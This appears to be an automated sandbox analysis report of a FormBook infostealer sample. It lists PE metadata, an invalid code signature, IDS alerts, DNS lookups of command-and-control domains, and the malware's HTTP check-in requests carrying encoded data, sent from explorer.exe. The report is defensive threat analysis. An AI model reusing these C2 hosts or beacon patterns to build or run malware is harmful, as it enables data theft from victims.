                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                          Subject Chain
                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                          Version:3
                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add al, 00h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add eax, dword ptr [eax]
                                          add eax, dword ptr [eax]
                                          add byte ptr [eax], al
                                          sub byte ptr [eax], al
                                          add byte ptr [eax+0000000Eh], al
                                          fadd dword ptr [eax]
                                          add byte ptr [eax+00000010h], al
                                          sub byte ptr [ecx], al
                                          add byte ptr [eax+00000000h], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add al, 00h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb7f200x4b.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x18ab0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xcf0000x3608
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xb5f740xb60002c5ad81765f56594c1572b96383924f4False0.8644724416208791data7.825436593603401IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xb80000x18ab00x18c005f32348aefb46229f1239d509b95bc4dFalse0.14479758522727273data4.274130101184592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xd20000xc0x2006771793aa70c21b7a6a469fcf7e7e76dFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xb81d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.2649377593360996
                                          RT_ICON0xba7800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.3646810506566604
                                          RT_ICON0xbb8280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5549645390070922
                                          RT_ICON0xbbc900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m0.18115257439773264
                                          RT_ICON0xbfeb80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.0959718443156276
                                          RT_GROUP_ICON0xd06e00x4cdata0.7631578947368421
                                          RT_GROUP_ICON0xd072c0x14data1.05
                                          RT_VERSION0xd07400x36adata0.43135011441647597

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          07/03/24-18:33:16.719137TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.6198.185.159.144
                                          07/03/24-18:32:36.955975TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.6185.53.179.92
                                          07/03/24-18:35:19.798968TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.63.33.130.190
                                          07/03/24-18:36:23.287483TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.654.67.42.145
                                          07/03/24-18:36:00.832032TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.6198.185.159.144
                                          07/03/24-18:33:37.796874TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.6203.196.8.7
                                          07/03/24-18:34:18.302843TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.615.197.142.173
                                          07/03/24-18:35:40.453540TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.6104.18.187.223
                                          07/03/24-18:34:59.312116TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.6192.250.227.27

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 3, 2024 18:32:36.950977087 CEST4972480192.168.2.6185.53.179.92
                                          Jul 3, 2024 18:32:36.955836058 CEST8049724185.53.179.92192.168.2.6
                                          Jul 3, 2024 18:32:36.955918074 CEST4972480192.168.2.6185.53.179.92
                                          Jul 3, 2024 18:32:36.955975056 CEST4972480192.168.2.6185.53.179.92
                                          Jul 3, 2024 18:32:36.961128950 CEST8049724185.53.179.92192.168.2.6
                                          Jul 3, 2024 18:32:37.469100952 CEST4972480192.168.2.6185.53.179.92
                                          Jul 3, 2024 18:32:37.475739002 CEST8049724185.53.179.92192.168.2.6
                                          Jul 3, 2024 18:32:37.475800037 CEST4972480192.168.2.6185.53.179.92
                                          Jul 3, 2024 18:33:16.714199066 CEST4972980192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:33:16.719008923 CEST8049729198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:33:16.719074011 CEST4972980192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:33:16.719136953 CEST4972980192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:33:16.725342989 CEST8049729198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:33:17.173898935 CEST8049729198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:33:17.173918009 CEST8049729198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:33:17.173990965 CEST8049729198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:33:17.174015045 CEST4972980192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:33:17.174071074 CEST4972980192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:33:17.174072027 CEST4972980192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:33:17.178982973 CEST8049729198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:33:37.791510105 CEST4973280192.168.2.6203.196.8.7
                                          Jul 3, 2024 18:33:37.796432018 CEST8049732203.196.8.7192.168.2.6
                                          Jul 3, 2024 18:33:37.796874046 CEST4973280192.168.2.6203.196.8.7
                                          Jul 3, 2024 18:33:37.796874046 CEST4973280192.168.2.6203.196.8.7
                                          Jul 3, 2024 18:33:37.801692009 CEST8049732203.196.8.7192.168.2.6
                                          Jul 3, 2024 18:33:38.310400963 CEST4973280192.168.2.6203.196.8.7
                                          Jul 3, 2024 18:33:38.363203049 CEST8049732203.196.8.7192.168.2.6
                                          Jul 3, 2024 18:33:38.417025089 CEST8049732203.196.8.7192.168.2.6
                                          Jul 3, 2024 18:33:38.424948931 CEST4973280192.168.2.6203.196.8.7
                                          Jul 3, 2024 18:34:18.286849976 CEST4973480192.168.2.615.197.142.173
                                          Jul 3, 2024 18:34:18.291781902 CEST804973415.197.142.173192.168.2.6
                                          Jul 3, 2024 18:34:18.302843094 CEST4973480192.168.2.615.197.142.173
                                          Jul 3, 2024 18:34:18.302843094 CEST4973480192.168.2.615.197.142.173
                                          Jul 3, 2024 18:34:18.307651997 CEST804973415.197.142.173192.168.2.6
                                          Jul 3, 2024 18:34:18.767915010 CEST804973415.197.142.173192.168.2.6
                                          Jul 3, 2024 18:34:18.767932892 CEST804973415.197.142.173192.168.2.6
                                          Jul 3, 2024 18:34:18.768014908 CEST4973480192.168.2.615.197.142.173
                                          Jul 3, 2024 18:34:18.768014908 CEST4973480192.168.2.615.197.142.173
                                          Jul 3, 2024 18:34:18.772989988 CEST804973415.197.142.173192.168.2.6
                                          Jul 3, 2024 18:34:59.307192087 CEST4973680192.168.2.6192.250.227.27
                                          Jul 3, 2024 18:34:59.311984062 CEST8049736192.250.227.27192.168.2.6
                                          Jul 3, 2024 18:34:59.312061071 CEST4973680192.168.2.6192.250.227.27
                                          Jul 3, 2024 18:34:59.312115908 CEST4973680192.168.2.6192.250.227.27
                                          Jul 3, 2024 18:34:59.317558050 CEST8049736192.250.227.27192.168.2.6
                                          Jul 3, 2024 18:34:59.798861980 CEST4973680192.168.2.6192.250.227.27
                                          Jul 3, 2024 18:34:59.805191040 CEST8049736192.250.227.27192.168.2.6
                                          Jul 3, 2024 18:34:59.810877085 CEST4973680192.168.2.6192.250.227.27
                                          Jul 3, 2024 18:35:19.790867090 CEST4973780192.168.2.63.33.130.190
                                          Jul 3, 2024 18:35:19.796694994 CEST80497373.33.130.190192.168.2.6
                                          Jul 3, 2024 18:35:19.798968077 CEST4973780192.168.2.63.33.130.190
                                          Jul 3, 2024 18:35:19.798968077 CEST4973780192.168.2.63.33.130.190
                                          Jul 3, 2024 18:35:19.805294037 CEST80497373.33.130.190192.168.2.6
                                          Jul 3, 2024 18:35:20.298868895 CEST4973780192.168.2.63.33.130.190
                                          Jul 3, 2024 18:35:20.304121017 CEST80497373.33.130.190192.168.2.6
                                          Jul 3, 2024 18:35:20.306917906 CEST4973780192.168.2.63.33.130.190
                                          Jul 3, 2024 18:36:00.826946974 CEST4974080192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:36:00.831876040 CEST8049740198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:36:00.831934929 CEST4974080192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:36:00.832031965 CEST4974080192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:36:00.836874962 CEST8049740198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:36:01.290170908 CEST8049740198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:36:01.290297985 CEST8049740198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:36:01.290451050 CEST4974080192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:36:01.291512966 CEST8049740198.185.159.144192.168.2.6
                                          Jul 3, 2024 18:36:01.291605949 CEST4974080192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:36:02.810961008 CEST4974080192.168.2.6198.185.159.144
                                          Jul 3, 2024 18:36:02.815943003 CEST8049740198.185.159.144192.168.2.6

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 3, 2024 18:32:36.891946077 CEST5567753192.168.2.61.1.1.1
                                          Jul 3, 2024 18:32:36.950251102 CEST53556771.1.1.1192.168.2.6
                                          Jul 3, 2024 18:32:57.485203981 CEST6387253192.168.2.61.1.1.1
                                          Jul 3, 2024 18:32:57.944962025 CEST53638721.1.1.1192.168.2.6
                                          Jul 3, 2024 18:33:16.641535997 CEST6121353192.168.2.61.1.1.1
                                          Jul 3, 2024 18:33:16.713393927 CEST53612131.1.1.1192.168.2.6
                                          Jul 3, 2024 18:33:37.032403946 CEST5729953192.168.2.61.1.1.1
                                          Jul 3, 2024 18:33:37.785401106 CEST53572991.1.1.1192.168.2.6
                                          Jul 3, 2024 18:34:18.238863945 CEST5325253192.168.2.61.1.1.1
                                          Jul 3, 2024 18:34:18.275497913 CEST53532521.1.1.1192.168.2.6
                                          Jul 3, 2024 18:34:38.688559055 CEST5457253192.168.2.61.1.1.1
                                          Jul 3, 2024 18:34:39.483324051 CEST53545721.1.1.1192.168.2.6
                                          Jul 3, 2024 18:34:59.187863111 CEST6313253192.168.2.61.1.1.1
                                          Jul 3, 2024 18:34:59.306581974 CEST53631321.1.1.1192.168.2.6
                                          Jul 3, 2024 18:35:19.766872883 CEST5661853192.168.2.61.1.1.1
                                          Jul 3, 2024 18:35:19.784297943 CEST53566181.1.1.1192.168.2.6
                                          Jul 3, 2024 18:35:40.205044985 CEST6318253192.168.2.61.1.1.1
                                          Jul 3, 2024 18:35:40.438488960 CEST53631821.1.1.1192.168.2.6
                                          Jul 3, 2024 18:36:00.750869989 CEST4936253192.168.2.61.1.1.1
                                          Jul 3, 2024 18:36:00.817023039 CEST53493621.1.1.1192.168.2.6
                                          Jul 3, 2024 18:36:22.953906059 CEST4982953192.168.2.61.1.1.1
                                          Jul 3, 2024 18:36:23.277204990 CEST53498291.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 3, 2024 18:32:36.891946077 CEST192.168.2.61.1.1.10xd74aStandard query (0)www.ux-design-courses-17184.bondA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:32:57.485203981 CEST192.168.2.61.1.1.10xba30Standard query (0)www.mzhhxxff.xyzA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:16.641535997 CEST192.168.2.61.1.1.10xf031Standard query (0)www.coloradoskinwellness.comA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:37.032403946 CEST192.168.2.61.1.1.10x956fStandard query (0)www.tiantiying.comA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:34:18.238863945 CEST192.168.2.61.1.1.10xbc04Standard query (0)www.theopencomputeproject.netA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:34:38.688559055 CEST192.168.2.61.1.1.10x79ccStandard query (0)www.z8ggd.comA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:34:59.187863111 CEST192.168.2.61.1.1.10x2468Standard query (0)www.equipoleiremnacional.comA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:35:19.766872883 CEST192.168.2.61.1.1.10xa6e1Standard query (0)www.detroitreels.comA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:35:40.205044985 CEST192.168.2.61.1.1.10x35c1Standard query (0)www.family-lawyers-7009103.worldA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:00.750869989 CEST192.168.2.61.1.1.10xe408Standard query (0)www.upcyclecharms.comA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:22.953906059 CEST192.168.2.61.1.1.10x1cb4Standard query (0)www.a1b5v.xyzA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 3, 2024 18:32:36.950251102 CEST1.1.1.1192.168.2.60xd74aNo error (0)www.ux-design-courses-17184.bond185.53.179.92A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:32:57.944962025 CEST1.1.1.1192.168.2.60xba30Name error (3)www.mzhhxxff.xyznonenoneA (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:16.713393927 CEST1.1.1.1192.168.2.60xf031No error (0)www.coloradoskinwellness.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 3, 2024 18:33:16.713393927 CEST1.1.1.1192.168.2.60xf031No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:16.713393927 CEST1.1.1.1192.168.2.60xf031No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:16.713393927 CEST1.1.1.1192.168.2.60xf031No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:16.713393927 CEST1.1.1.1192.168.2.60xf031No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:33:37.785401106 CEST1.1.1.1192.168.2.60x956fNo error (0)www.tiantiying.com203.196.8.7A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:34:18.275497913 CEST1.1.1.1192.168.2.60xbc04No error (0)www.theopencomputeproject.nettheopencomputeproject.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 3, 2024 18:34:18.275497913 CEST1.1.1.1192.168.2.60xbc04No error (0)theopencomputeproject.net15.197.142.173A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:34:18.275497913 CEST1.1.1.1192.168.2.60xbc04No error (0)theopencomputeproject.net3.33.152.147A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:34:59.306581974 CEST1.1.1.1192.168.2.60x2468No error (0)www.equipoleiremnacional.comequipoleiremnacional.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 3, 2024 18:34:59.306581974 CEST1.1.1.1192.168.2.60x2468No error (0)equipoleiremnacional.com192.250.227.27A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:35:19.784297943 CEST1.1.1.1192.168.2.60xa6e1No error (0)www.detroitreels.comdetroitreels.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 3, 2024 18:35:19.784297943 CEST1.1.1.1192.168.2.60xa6e1No error (0)detroitreels.com3.33.130.190A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:35:19.784297943 CEST1.1.1.1192.168.2.60xa6e1No error (0)detroitreels.com15.197.148.33A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:35:40.438488960 CEST1.1.1.1192.168.2.60x35c1No error (0)www.family-lawyers-7009103.worldssl1.prod.systemdragon.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 3, 2024 18:35:40.438488960 CEST1.1.1.1192.168.2.60x35c1No error (0)ssl1.prod.systemdragon.com104.18.187.223A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:35:40.438488960 CEST1.1.1.1192.168.2.60x35c1No error (0)ssl1.prod.systemdragon.com104.18.188.223A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:00.817023039 CEST1.1.1.1192.168.2.60xe408No error (0)www.upcyclecharms.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 3, 2024 18:36:00.817023039 CEST1.1.1.1192.168.2.60xe408No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:00.817023039 CEST1.1.1.1192.168.2.60xe408No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:00.817023039 CEST1.1.1.1192.168.2.60xe408No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:00.817023039 CEST1.1.1.1192.168.2.60xe408No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                          Jul 3, 2024 18:36:23.277204990 CEST1.1.1.1192.168.2.60x1cb4No error (0)www.a1b5v.xyz54.67.42.145A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.ux-design-courses-17184.bond
                                          • www.coloradoskinwellness.com
                                          • www.tiantiying.com
                                          • www.theopencomputeproject.net
                                          • www.equipoleiremnacional.com
                                          • www.detroitreels.com
                                          • www.upcyclecharms.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.649724185.53.179.92804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 3, 2024 18:32:36.955975056 CEST194OUTGET /md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.ux-design-courses-17184.bond
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.649729198.185.159.144804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 3, 2024 18:33:16.719136953 CEST190OUTGET /md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.coloradoskinwellness.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 3, 2024 18:33:17.173898935 CEST1236INHTTP/1.1 400 Bad Request
                                          Cache-Control: no-cache, must-revalidate
                                          Content-Length: 2061
                                          Content-Type: text/html; charset=UTF-8
                                          Date: Wed, 03 Jul 2024 16:33:17 UTC
                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                          Pragma: no-cache
                                          Server: Squarespace
                                          X-Contextid: kap5k5ZG/wsesyS8Z
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
                                          Jul 3, 2024 18:33:17.173918009 CEST1124INData Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20
                                          Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.649732203.196.8.7804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 3, 2024 18:33:37.796874046 CEST180OUTGET /md02/?TPXh=4AwpHqQNViPAc6H2SH6W32NBDbh/yf/Y2D8hgqFIHxnXsLrA8hdQjo1iXHj4HnJ/ZqvHoeNZWw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.tiantiying.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.64973415.197.142.173804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 3, 2024 18:34:18.302843094 CEST191OUTGET /md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.theopencomputeproject.net
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 3, 2024 18:34:18.767915010 CEST266INHTTP/1.1 403 Forbidden
                                          Server: awselb/2.0
                                          Date: Wed, 03 Jul 2024 16:34:18 GMT
                                          Content-Type: text/html
                                          Content-Length: 118
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.649736192.250.227.27804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 3, 2024 18:34:59.312115908 CEST190OUTGET /md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.equipoleiremnacional.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.6497373.33.130.190804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
